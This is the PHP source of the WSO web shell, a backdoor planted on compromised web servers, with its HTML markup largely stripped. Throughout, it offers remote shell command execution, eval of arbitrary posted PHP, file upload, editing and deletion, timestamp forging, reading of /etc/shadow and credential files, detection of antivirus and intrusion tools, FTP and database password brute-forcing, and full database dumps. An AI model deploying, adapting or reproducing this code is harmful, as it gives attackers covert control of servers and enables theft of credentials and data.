Puzzle
");}function pk($txt){$t='';for($i=0;$i"dir","Find index.php in current dir"=>"dir /s /w /b index.php","Find *config*.php in current dir"=>"dir /s /w /b *config*.php","Show active connections"=>"netstat -an","Show running services"=>"net start","User accounts"=>"net user","Show computers"=>"net view","ARP Table"=>"arp -a","IP Configuration"=>"ipconfig /all");else $aliases=array("List dir"=>"ls -lha","list file attributes on a Linux second extended file system"=>"lsattr -va","show opened ports"=>"netstat -an | grep -i listen","process status"=>"ps aux","Find"=>"","find php files"=>"find . -type f -name *.php","find all suid files"=>"find / -type f -perm -04000 -ls","find suid files here"=>"find . -type f -perm -04000 -ls","find all sgid files"=>"find / -type f -perm -02000 -ls","find sgid files here"=>"find . -type f -perm -02000 -ls","find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls","find service.pwd files here"=>"find . -type f -name service.pwd","find all .htpasswd files"=>"find / -type f -name .htpasswd","find .htpasswd files here"=>"find . -type f -name .htpasswd","find .bash_history files here"=>"find . -type f -name .bash_history","find .fetchmailrc files here"=>"find . -type f -name .fetchmailrc",);$wpconfig='wp-config.php';$fnd=0;$limit=7;do{if(file_exists("$cwd/$wpconfig")){$fnd++; break;}$wpconfig="../$wpconfig";}while($limit-->0);if($fnd)$wpconfig=realpath("$cwd/$wpconfig"); else $wpconfig=false;function _wss3(){if(empty($_POST['charset']))$_POST['charset']=$GLOBALS['default_charset'];global $color;echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "
";$freeSpace=@diskfreespace($GLOBALS['cwd']);$totalSpace=@disk_total_space($GLOBALS['cwd']);$totalSpace=$totalSpace ? $totalSpace:1;$release=@php_uname('r');$kernel=@php_uname('s');$explink='http://exploit-db.com/search/?action=search&filter_description=';if(strpos('Linux', $kernel)!== false)$explink.= urlencode('Linux Kernel ' . substr($release, 0, 6));else $explink.= urlencode($kernel . ' ' . substr($release, 0, 3));if(!function_exists('posix_getegid')){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="?";}else {$uid=@posix_getpwuid(posix_geteuid());$gid=@posix_getgrgid(posix_getegid());$user=$uid['name'];$uid=$uid['uid'];$group=$gid['name'];$gid=$gid['gid'];}$cwd_links='';$path=explode("/", $GLOBALS['cwd']);$n=count($path);for($i=0; $i < $n - 1; $i++){$cwd_links.= "" . $path[$i] . "/";}$charsets=array('UTF-8','Windows-1251','cp866' );$opt_charsets='';foreach($charsets as $item)$opt_charsets.= '';$m=array('Sec. Info'=>'SecInfo','Files'=>'Bsx','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Wordpress'=>'WP','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network' );if(!empty($GLOBALS['auth_pass']))$m['Logout']='Logout';$m['Self remove']='SelfRemove';if(!$GLOBALS['wpconfig'])unset($m['Wordpress']);$menu='';foreach($m as $k=>$v)$menu.= '[ ' . $k . ' ]';$drives="";if($GLOBALS['os']=='win'){foreach(range('c', 'z')as $drive)if(is_dir($drive . ':\\'))$drives.= '[ ' . $drive . ' ] ';}echo ''.''.'
Uname:
User:
Php:
Hdd:
Cwd:' .($GLOBALS['os']=='win' ? '
Drives:':''). '		' . substr(@php_uname(), 0, 120). ' [exploit-db.com]
' . $uid . '( ' . $user . ') Group: ' . $gid . '( ' . $group . ')
' . @phpversion(). ' Safe mode: ' .($GLOBALS['safe_mode'] ? 'ON':'OFF'). ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s'). '
' . _wss4($totalSpace). ' Free: ' . _wss4($freeSpace). '(' .(int)($freeSpace / $totalSpace * 100). '%)
' . $cwd_links . ' ' . _wss5($GLOBALS['cwd']). ' [ home ]
' . $drives . '
Server IP:
' . @$_SERVER['SERVER_ADDR'] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
'.'' . $menu . '
';}function _wss7(){$is_writable=is_writable($GLOBALS['cwd'])? " (Writeable)":" (Not writable)";echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable
";}if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS['disable_functions'], 'posix_getpwuid')=== false)){function posix_getpwuid($p){return false;}}if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS['disable_functions'], 'posix_getgrgid')=== false)){function posix_getgrgid($p){return false;}}function wsoEx($in){$out='';if(function_exists('exec')){@exec($in, $out);$out=@join("\n", $out);}elseif(function_exists('passthru')){ob_start();@passthru($in);$out=ob_get_clean();}elseif(function_exists('system')){ob_start();@system($in);$out=ob_get_clean();}elseif(function_exists('shell_exec')){$out=shell_exec($in);}elseif(is_resource($f=@popen($in, "r"))){$out="";while(!@feof($f))$out.= fread($f, 1024);pclose($f);}return $out;}function _wss4($s){if($s >= 1073741824)return sprintf('%1.2f', $s / 1073741824). ' GB';elseif($s >= 1048576)return sprintf('%1.2f', $s / 1048576). ' MB';elseif($s >= 1024)return sprintf('%1.2f', $s / 1024). ' KB';else return $s . ' B';}function _wss8($p){if(($p & 0xC000)== 0xC000)$i='s';elseif(($p & 0xA000)== 0xA000)$i='l';elseif(($p & 0x8000)== 0x8000)$i='-';elseif(($p & 0x6000)== 0x6000)$i='b';elseif(($p & 0x4000)== 0x4000)$i='d';elseif(($p & 0x2000)== 0x2000)$i='c';elseif(($p & 0x1000)== 0x1000)$i='p';else $i='u';$i.=(($p & 0x0100)? 'r':'-');$i.=(($p & 0x0080)? 'w':'-');$i.=(($p & 0x0040)?(($p & 0x0800)? 's':'x'):(($p & 0x0800)? 'S':'-'));$i.=(($p & 0x0020)? 'r':'-');$i.=(($p & 0x0010)? 'w':'-');$i.=(($p & 0x0008)?(($p & 0x0400)? 's':'x'):(($p & 0x0400)? 'S':'-'));$i.=(($p & 0x0004)? 'r':'-');$i.=(($p & 0x0002)? 'w':'-');$i.=(($p & 0x0001)?(($p & 0x0200)? 't':'x'):(($p & 0x0200)? 'T':'-'));return $i;}function _wss5($f){if(!@is_readable($f))return '' . _wss8(@fileperms($f)). '';elseif(!@is_writable($f))return '' . _wss8(@fileperms($f)). '';else return '' . _wss8(@fileperms($f)). '';}function wsoScandir($dir){if(function_exists("scandir")){return scandir($dir);}else {$dh=opendir($dir);while(false !==($filename=readdir($dh)))$files[]=$filename;return $files;}}function wsoWhich($p){$path=wsoEx('which ' . $p);if(!empty($path))return $path;return false;}function actionSecInfo(){_wss3();echo '

Server security information

';function wsoSecParam($n, $v){$v=trim($v);if($v){echo '' . $n . ': ';if(strpos($v, "\n")=== false)echo $v . '
';else echo '
' . $v . '
';}}wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));if(function_exists('apache_get_modules'))wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions']:'none');wsoSecParam('Open base dir', @ini_get('open_basedir'));wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));wsoSecParam('cURL support', function_exists('curl_version')? 'enabled':'no');$temp=array();if(function_exists('mysql_get_client_info'))$temp[]="MySql(" . mysql_get_client_info(). ")";if(function_exists('mssql_connect'))$temp[]="MSSQL";if(function_exists('pg_connect'))$temp[]="PostgreSQL";if(function_exists('oci_connect'))$temp[]="Oracle";wsoSecParam('Supported databases', implode(', ', $temp));echo '
';if($GLOBALS['os']=='nix'){wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')? "yes [view]":'no');wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')? "yes [view]":'no');wsoSecParam('OS version', @file_get_contents('/proc/version'));wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));if(!$GLOBALS['safe_mode']){$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl' );$danger=array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja' );$downloaders=array('wget','fetch','lynx','links','curl','get','lwp-mirror' );echo '
';$temp=array();foreach($userful as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Userful', implode(', ', $temp));$temp=array();foreach($danger as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Danger', implode(', ', $temp));$temp=array();foreach($downloaders as $item)if(wsoWhich($item))$temp[]=$item;wsoSecParam('Downloaders', implode(', ', $temp));echo '
';wsoSecParam('HDD space', wsoEx('df -h'));wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));echo '
posix_getpwuid("Read" /etc/passwd)
From
To
';if(isset($_POST['p2'], $_POST['p3'])&& is_numeric($_POST['p2'])&& is_numeric($_POST['p3'])){$temp="";for(; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++){$uid=@posix_getpwuid($_POST['p2']);if($uid)$temp.= join(':', $uid). "\n";}echo '
';wsoSecParam('Users', $temp);}}}else {wsoSecParam('OS Version', wsoEx('ver'));wsoSecParam('Account Settings', wsoEx('net accounts'));wsoSecParam('User Accounts', wsoEx('net user'));}echo '
';_wss7();}function actionPhp(){if(isset($_POST['ajax'])){_wss($GLOBALS['shp'] . 'ajax', true);ob_start();eval($_POST['p1']);$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0"). "';\n";echo strlen($temp), "\n", $temp;exit;}if(empty($_POST['ajax'])&& !empty($_POST['p1']))_wss($GLOBALS['shp'] . 'ajax', 0);_wss3();if(isset($_POST['p2'])&&($_POST['p2']=='info')){echo '

PHP info

';ob_start();phpinfo();$tmp=ob_get_clean();$tmp=preg_replace(array('!(body|a:\w+|body, td, th, h1, h2){.*}!msiU','!td, th {(.*)}!msiU','!]+>!msiU',), array('','.e, .v, .h, .h th {$1}','' ), $tmp);echo str_replace('
';}echo '

Execution PHP-code

';echo ' send using AJAX
';if(!empty($_POST['p1'])){ob_start();eval($_POST['p1']);echo htmlspecialchars(ob_get_clean());}echo '
';_wss7();}function actionBsx(){if(!empty($_COOKIE['f']))$_COOKIE['f']=@unserialize($_COOKIE['f']);if(!empty($_POST['p1'])){switch($_POST['p1']){case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))echo "Can't upload file!";break;case 'mkdir': if(!@mkdir($_POST['p2']))echo "Can't create new dir";break;case 'delete': function deleteDir($path){$path=(substr($path, -1)== '/')? $path:$path . '/';$dh=opendir($path);while(($item=readdir($dh))!== false){$item=$path . $item;if((basename($item)== "..")||(basename($item)== ".")||(realpath($item)== $GLOBALS['_se']))continue;$type=filetype($item);if($type=="dir")deleteDir($item);else @unlink($item);}closedir($dh);@rmdir($path);}if(is_array(@$_POST['f']))foreach($_POST['f'] as $f){$f=urldecode($f);if(($f=='..')||($f=='.')||(realpath($f)== $GLOBALS['_se']))continue;if(is_dir($f))deleteDir($f);else @unlink($f);}break;case 'paste': if($_COOKIE['act']=='copy'){function copy_paste($c, $s, $d){if(is_dir($c . $s)){mkdir($d . $s);$h=@opendir($c . $s);while(($f=@readdir($h))!== false)if(($f != ".")and($f != ".."))copy_paste($c . $s . '/', $f, $d . $s . '/');}elseif(is_file($c . $s))@copy($c . $s, $d . $s);}foreach($_COOKIE['f'] as $f)copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);}elseif($_COOKIE['act']=='move'){function move_paste($c, $s, $d){if(is_dir($c . $s)){mkdir($d . $s);$h=@opendir($c . $s);while(($f=@readdir($h))!== false)if(($f != ".")and($f != ".."))copy_paste($c . $s . '/', $f, $d . $s . '/');}elseif(@is_file($c . $s))@copy($c . $s, $d . $s);}foreach($_COOKIE['f'] as $f)@rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);}elseif($_COOKIE['act']=='zip'){if(class_exists('ZipArchive')){$zip=new ZipArchive();if($zip->open($_POST['p2'], 1)){chdir($_COOKIE['c']);foreach($_COOKIE['f'] as $f){if($f=='..')continue;if(@is_file($_COOKIE['c'] . $f))$zip->addFile($_COOKIE['c'] . $f, $f);elseif(@is_dir($_COOKIE['c'] . $f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));foreach($iterator as $key=>$value){$zip->addFile(realpath($key), $key);}}}chdir($GLOBALS['cwd']);$zip->close();}}}elseif($_COOKIE['act']=='unzip'){if(class_exists('ZipArchive')){$zip=new ZipArchive();foreach($_COOKIE['f'] as $f){if($zip->open($_COOKIE['c'] . $f)){$zip->extractTo($GLOBALS['cwd']);$zip->close();}}}}elseif($_COOKIE['act']=='tar'){chdir($_COOKIE['c']);$_COOKIE['f']=array_map('escapeshellarg', $_COOKIE['f']);wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']). ' ' . implode(' ', $_COOKIE['f']));chdir($GLOBALS['cwd']);}unset($_COOKIE['f']);setcookie('f', '', time()- 3600);break;default: if(!empty($_POST['p1'])){_wss('act', $_POST['p1']);_wss('f', serialize(@$_POST['f']));_wss('c', @$_POST['c']);}break;}}_wss3();echo '

File manager

';$dirContent=wsoScandir(isset($_POST['c'])? $_POST['c']:$GLOBALS['cwd']);if($dirContent === false){echo 'Can\'t open this folder!';_wss7();return;}global $sort;$sort=array('name',1 );if(!empty($_POST['p1'])){if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))$sort=array($match[1],(int)$match[2] );}echo " ";$dirs=$files=array();$n=count($dirContent);for($i=0; $i < $n; $i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array('name'=>$dirContent[$i],'path'=>$GLOBALS['cwd'] . $dirContent[$i],'modify'=>date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),'perms'=>_wss5($GLOBALS['cwd'] . $dirContent[$i]),'size'=>@filesize($GLOBALS['cwd'] . $dirContent[$i]),'owner'=>$ow['name'] ? $ow['name']:@fileowner($dirContent[$i]),'group'=>$gr['name'] ? $gr['name']:@filegroup($dirContent[$i]));if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))$files[]=array_merge($tmp, array('type'=>'file' ));elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))$dirs[]=array_merge($tmp, array('type'=>'link','link'=>readlink($tmp['path'])));elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))$dirs[]=array_merge($tmp, array('type'=>'dir' ));}$GLOBALS['sort']=$sort;function wsoCmp($a, $b){if($GLOBALS['sort'][0] != 'size')return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1] ? 1:-1);else return(($a['size'] < $b['size'])? -1:1)*($GLOBALS['sort'][1] ? 1:-1);}usort($files, "wsoCmp");usort($dirs, "wsoCmp");$files=array_merge($dirs, $files);$l=0;foreach($files as $f){echo '';$l=$l ? 0:1;}echo "
NameSizeModifyOwner/GroupPermissionsActions
' . htmlspecialchars($f['name']): 'g(\'Bsx\',\'' . $f['path'] . '\');" ' .(empty($f['link'])? '':"title='{$f['link']}'"). '>[ ' . htmlspecialchars($f['name']). ' ]'). '' .(($f['type']=='file')? _wss4($f['size']): $f['type']). '' . $f['modify'] . '' . $f['owner'] . '/' . $f['group'] . '' . $f['perms'] . 'R T' .(($f['type']=='file')? ' E D':''). '
 ";if(!empty($_COOKIE['act'])&& @count($_COOKIE['f'])&&(($_COOKIE['act']=='zip')||($_COOKIE['act']=='tar')))echo "file name:  ";echo "
";_wss7();}function actionStringTools(){if(!function_exists('hex2bin')){function hex2bin($p){return decbin(hexdec($p));}}if(!function_exists('binhex')){function binhex($p){return dechex(bindec($p));}}if(!function_exists('hex2ascii')){function hex2ascii($p){$r='';for($i=0; $i < strLen($p); $i+= 2){$r.= chr(hexdec($p[$i] . $p[$i + 1]));}return $r;}}if(!function_exists('ascii2hex')){function ascii2hex($p){$r='';for($i=0; $i < strlen($p); ++$i)$r.= sprintf('%02X', ord($p[$i]));return strtoupper($r);}}if(!function_exists('full_urlencode')){function full_urlencode($p){$r='';for($i=0; $i < strlen($p); ++$i)$r.= '%' . dechex(ord($p[$i]));return strtoupper($r);}}$stringTools=array('String to Octal'=>'pk','Base64 encode'=>'base64_encode','Base64 decode'=>'base64_decode','Url encode'=>'urlencode','Url decode'=>'urldecode','Full urlencode'=>'full_urlencode','md5 hash'=>'md5','sha1 hash'=>'sha1','crypt'=>'crypt','CRC32'=>'crc32','ASCII to HEX'=>'ascii2hex','HEX to ASCII'=>'hex2ascii','HEX to DEC'=>'hexdec','HEX to BIN'=>'hex2bin','DEC to HEX'=>'dechex','DEC to BIN'=>'decbin','BIN to HEX'=>'binhex','BIN to DEC'=>'bindec','String to lower case'=>'strtolower','String to upper case'=>'strtoupper','Htmlspecialchars'=>'htmlspecialchars','String length'=>'strlen',);if(isset($_POST['ajax'])){_wss($GLOBALS['shp'] . 'ajax', true);ob_start();if(in_array($_POST['p1'], $stringTools))echo $_POST['p1']($_POST['p2']);$temp="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0"). "';\n";echo strlen($temp), "\n", $temp;exit;}if(empty($_POST['ajax'])&& !empty($_POST['p1']))_wss($GLOBALS['shp'] . 'ajax', 0);_wss3();echo '

String conversions

';echo "
send using AJAX
";if(!empty($_POST['p1'])){if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));}echo "

Search files:

Text:
Path:
Name:
";function wsoRecursiveGlob($path){if(substr($path, -1)!= '/')$path.= '/';$paths=@array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));if(is_array($paths)&& @count($paths)){foreach($paths as $item){if(@is_dir($item)){if($path != $item)wsoRecursiveGlob($item);}else {if(empty($_POST['p2'])|| @strpos(file_get_contents($item), $_POST['p2'])!== false)echo "" . htmlspecialchars($item). "
";}}}}if(@$_POST['p3'])wsoRecursiveGlob($_POST['c']);echo "

Search for hash:





";_wss7();}function actionFilesTools(){if(isset($_POST['p1']))$_POST['p1']=urldecode($_POST['p1']);if(@$_POST['p2']=='download'){if(@is_file($_POST['p1'])&& @is_readable($_POST['p1'])){ob_start("ob_gzhandler", 4096);header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));if(function_exists("mime_content_type")){$type=@mime_content_type($_POST['p1']);header("Content-Type: " . $type);}else header("Content-Type: application/octet-stream");$fp=@fopen($_POST['p1'], "r");if($fp){while(!@feof($fp))echo @fread($fp, 1024);fclose($fp);}}exit;}if(@$_POST['p2']=='mkfile'){if(!file_exists($_POST['p1'])){$fp=@fopen($_POST['p1'], 'w');if($fp){$_POST['p2']="edit";fclose($fp);}}}_wss3();echo '

File tools

';if(!file_exists(@$_POST['p1'])){echo 'File not exists';_wss7();return;}$uid=@posix_getpwuid(@fileowner($_POST['p1']));if(!$uid){$uid['name']=@fileowner($_POST['p1']);$gid['name']=@filegroup($_POST['p1']);}else $gid=@posix_getgrgid(@filegroup($_POST['p1']));echo 'Name: ' . htmlspecialchars(@basename($_POST['p1'])). ' Size: ' .(is_file($_POST['p1'])? _wss4(filesize($_POST['p1'])): '-'). ' Permission: ' . _wss5($_POST['p1']). ' Owner/Group: ' . $uid['name'] . '/' . $gid['name'] . '
';echo 'Create time: ' . date('Y-m-d H:i:s', filectime($_POST['p1'])). ' Access time: ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])). ' Modify time: ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])). '

';if(empty($_POST['p2']))$_POST['p2']='view';if(is_file($_POST['p1']))$m=array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch' );else $m=array('Chmod','Rename','Touch' );foreach($m as $v)echo '' .((strtolower($v)== @$_POST['p2'])? '[ ' . $v . ' ]':$v). ' ';echo '

';switch($_POST['p2']){case 'view': echo '
';$fp=@fopen($_POST['p1'], 'r');if($fp){while(!@feof($fp))echo htmlspecialchars(@fread($fp, 1024));@fclose($fp);}echo '
';break;case 'highlight': if(@is_readable($_POST['p1'])){echo '
';$code=@highlight_file($_POST['p1'], true);echo str_replace(array('' ), array('' ), $code). '
';}break;case 'chmod': if(!empty($_POST['p3'])){$perms=0;for($i=strlen($_POST['p3'])- 1; $i >= 0; --$i)$perms+=(int)$_POST['p3'][$i] * pow(8,(strlen($_POST['p3'])- $i - 1));if(!@chmod($_POST['p1'], $perms))echo 'Can\'t set permissions!
';}clearstatcache();echo '
';break;case 'edit': if(!is_writable($_POST['p1'])){echo 'File isn\'t writeable';break;}if(!empty($_POST['p3'])){$time=@filemtime($_POST['p1']);$_POST['p3']=substr($_POST['p3'], 1);$fp=@fopen($_POST['p1'], "w");if($fp){@fwrite($fp, $_POST['p3']);@fclose($fp);echo 'Saved!
';@touch($_POST['p1'], $time, $time);}}echo '
';break;case 'hexdump': $c=@file_get_contents($_POST['p1']);$n=0;$h=array('00000000
','','' );$len=strlen($c);for($i=0; $i < $len; ++$i){$h[1].= sprintf('%02X', ord($c[$i])). ' ';switch(ord($c[$i])){case 0: $h[2].= ' ';break;case 9: $h[2].= ' ';break;case 10: $h[2].= ' ';break;case 13: $h[2].= ' ';break;default: $h[2].= $c[$i];break;}$n++;if($n==32){$n=0;if($i + 1 < $len){$h[0].= sprintf('%08X', $i + 1). '
';}$h[1].= '
';$h[2].= "\n";}}echo '
' . $h[0] . '
' . $h[1] . '
' . htmlspecialchars($h[2]). '
';break;case 'rename': if(!empty($_POST['p3'])){if(!@rename($_POST['p1'], $_POST['p3']))echo 'Can\'t rename!
';else die('');}echo '
';break;case 'touch': if(!empty($_POST['p3'])){$time=strtotime($_POST['p3']);if($time){if(!touch($_POST['p1'], $time, $time))echo 'Fail!';else echo 'Touched!';}else echo 'Bad time format!';}clearstatcache();echo '
';break;}echo '
';_wss7();}function actionConsole(){if(!empty($_POST['p1'])&& !empty($_POST['p2'])){_wss($GLOBALS['shp'] . 'stderr_to_out', true);$_POST['p1'].= ' 2>&1';}elseif(!empty($_POST['p1']))_wss($GLOBALS['shp'] . 'stderr_to_out', 0);if(isset($_POST['ajax'])){_wss($GLOBALS['shp'] . 'ajax', true);ob_start();echo "d.cf.cmd.value='';\n";$temp=@iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']), "\n\r\t\\'\0"));if(preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)){if(@chdir($match[1])){$GLOBALS['cwd']=@getcwd();echo "c_='" . $GLOBALS['cwd'] . "';";}}echo "d.cf.output.value+='" . $temp . "';";echo "d.cf.output.scrollTop=d.cf.output.scrollHeight;";$temp=ob_get_clean();echo strlen($temp), "\n", $temp;exit;}if(empty($_POST['ajax'])&& !empty($_POST['p1']))_wss($GLOBALS['shp'] . 'ajax', 0);_wss3();echo "";echo '

Console

send using AJAX redirect stderr to stdout(2>&1)
$
';echo '
';_wss7();}function actionLogout(){global $shp;_wss($shp, '');die('bye!');}function actionSelfRemove(){if($_POST['p1']=='yes')if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))die('Shell has been removed');else echo 'unlink error!';if($_POST['p1'] != 'yes')_wss3();echo '

Suicide

Really want to remove the shell?
Yes
';_wss7();}function actionBruteforce(){_wss3();if(isset($_POST['proto'])){echo '

Results

Type: ' . htmlspecialchars($_POST['proto']). ' Server: ' . htmlspecialchars($_POST['server']). '
';if($_POST['proto']=='ftp'){function wsoBruteForce($ip, $port, $login, $pass){$fp=@ftp_connect($ip, $port ? $port:21);if(!$fp)return false;$res=@ftp_login($fp, $login, $pass);@ftp_close($fp);return $res;}}elseif($_POST['proto']=='mysql'){function wsoBruteForce($ip, $port, $login, $pass){$res=@mysql_connect($ip . ':' . $port ? $port:3306, $login, $pass);@mysql_close($res);return $res;}}elseif($_POST['proto']=='pgsql'){function wsoBruteForce($ip, $port, $login, $pass){$str="host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";$res=@pg_connect($str);@pg_close($res);return $res;}}$success=0;$attempts=0;$server=explode(":", $_POST['server']);if($_POST['type']==1){$temp=@file('/etc/passwd');if(is_array($temp))foreach($temp as $line){$line=explode(":", $line);++$attempts;if(wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])){$success++;echo '' . htmlspecialchars($line[0]). ':' . htmlspecialchars($line[0]). '
';}if(@$_POST['reverse']){$tmp="";for($i=strlen($line[0])- 1; $i >= 0; --$i)$tmp.= $line[0][$i];++$attempts;if(wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)){$success++;echo '' . htmlspecialchars($line[0]). ':' . htmlspecialchars($tmp);}}}}elseif($_POST['type']==2){$temp=@file($_POST['dict']);if(is_array($temp))foreach($temp as $line){$line=trim($line);++$attempts;if(wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)){$success++;echo '' . htmlspecialchars($_POST['login']). ':' . htmlspecialchars($line). '
';}}}echo "Attempts: $attempts Success: $success

";}echo '

Bruteforce

'.''.''.''.''.''.''.'
Type
'.''.''.''.'Server:port
Brute type
'.''.''.'
Login
Dictionary
'.'
';echo '

';_wss7();}function actionSql(){class DbClass {var $type;var $link;var $res;function DbClass($type){$this->type=$type;}function connect($host, $user, $pass, $dbname){switch($this->type){case 'mysql': if($this->link=@mysql_connect($host, $user, $pass, true))return true;break;case 'pgsql': $host=explode(':', $host);if(!$host[1])$host[1]=5432;if($this->link=@pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))return true;break;}return false;}function selectdb($db){switch($this->type){case 'mysql': if(@mysql_select_db($db))return true;break;}return false;}function query($str){switch($this->type){case 'mysql': return $this->res=@mysql_query($str);break;case 'pgsql': return $this->res=@pg_query($this->link, $str);break;}return false;}function fetch(){$res=func_num_args()? func_get_arg(0): $this->res;switch($this->type){case 'mysql': return @mysql_fetch_assoc($res);break;case 'pgsql': return @pg_fetch_assoc($res);break;}return false;}function listDbs(){switch($this->type){case 'mysql': return $this->query("SHOW databases");break;case 'pgsql': return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");break;}return false;}function listTables(){switch($this->type){case 'mysql': return $this->res=$this->query('SHOW TABLES');break;case 'pgsql': return $this->res=$this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");break;}return false;}function error(){switch($this->type){case 'mysql': return @mysql_error();break;case 'pgsql': return @pg_last_error();break;}return false;}function setCharset($str){switch($this->type){case 'mysql': if(function_exists('mysql_set_charset'))return @mysql_set_charset($str, $this->link);else $this->query('SET CHARSET ' . $str);break;case 'pgsql': return @pg_set_client_encoding($this->link, $str);break;}return false;}function loadFile($str){switch($this->type){case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str). "')as file"));break;case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str). "';select file from wso2;");$r=array();while($i=$this->fetch())$r[]=$i['file'];$this->query('drop table wso2');return array('file'=>implode("\n", $r));break;}return false;}function dump($table, $fp=false){switch($this->type){case 'mysql': $res=$this->query('SHOW CREATE TABLE `' . $table . '`');$create=mysql_fetch_array($res);$sql=$create[1] . ";\n";if($fp)fwrite($fp, $sql);else echo($sql);$this->query('SELECT * FROM `' . $table . '`');$i=0;$head=true;while($item=$this->fetch()){$sql='';if($i % 1000==0){$head=true;$sql=";\n\n";}$columns=array();foreach($item as $k=>$v){if($v === null)$item[$k]="NULL";elseif(is_int($v))$item[$k]=$v;else $item[$k]="'" . @mysql_real_escape_string($v). "'";$columns[]="`" . $k . "`";}if($head){$sql.= 'INSERT INTO `' . $table . '`(' . implode(", ", $columns). ")VALUES \n\t(" . implode(", ", $item). ')';$head=false;}else $sql.= "\n\t,(" . implode(", ", $item). ')';if($fp)fwrite($fp, $sql);else echo($sql);$i++;}if(!$head)if($fp)fwrite($fp, ";\n\n");else echo(";\n\n");break;case 'pgsql': $this->query('SELECT * FROM ' . $table);while($item=$this->fetch()){$columns=array();foreach($item as $k=>$v){$item[$k]="'" . addslashes($v). "'";$columns[]=$k;}$sql='INSERT INTO ' . $table . '(' . implode(", ", $columns). ')VALUES(' . implode(", ", $item). ');' . "\n";if($fp)fwrite($fp, $sql);else echo($sql);}break;}return false;}};$db=new DbClass($_POST['type']);if(@$_POST['p2']=='download'){$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);$db->selectdb($_POST['sql_base']);switch($_POST['charset']){case "Windows-1251": $db->setCharset('cp1251');break;case "UTF-8": $db->setCharset('utf8');break;case "KOI8-R": $db->setCharset('koi8r');break;case "KOI8-U": $db->setCharset('koi8u');break;case "cp866": $db->setCharset('cp866');break;}if(empty($_POST['file'])){ob_start("ob_gzhandler", 4096);header("Content-Disposition: attachment; filename=dump.sql");header("Content-Type: text/plain");foreach($_POST['tbl'] as $v)$db->dump($v);exit;}elseif($fp=@fopen($_POST['file'], 'w')){foreach($_POST['tbl'] as $v)$db->dump($v, $fp);fclose($fp);unset($_POST['p2']);}else die('');}_wss3();echo "

Sql browser

TypeHostLoginPasswordDatabase
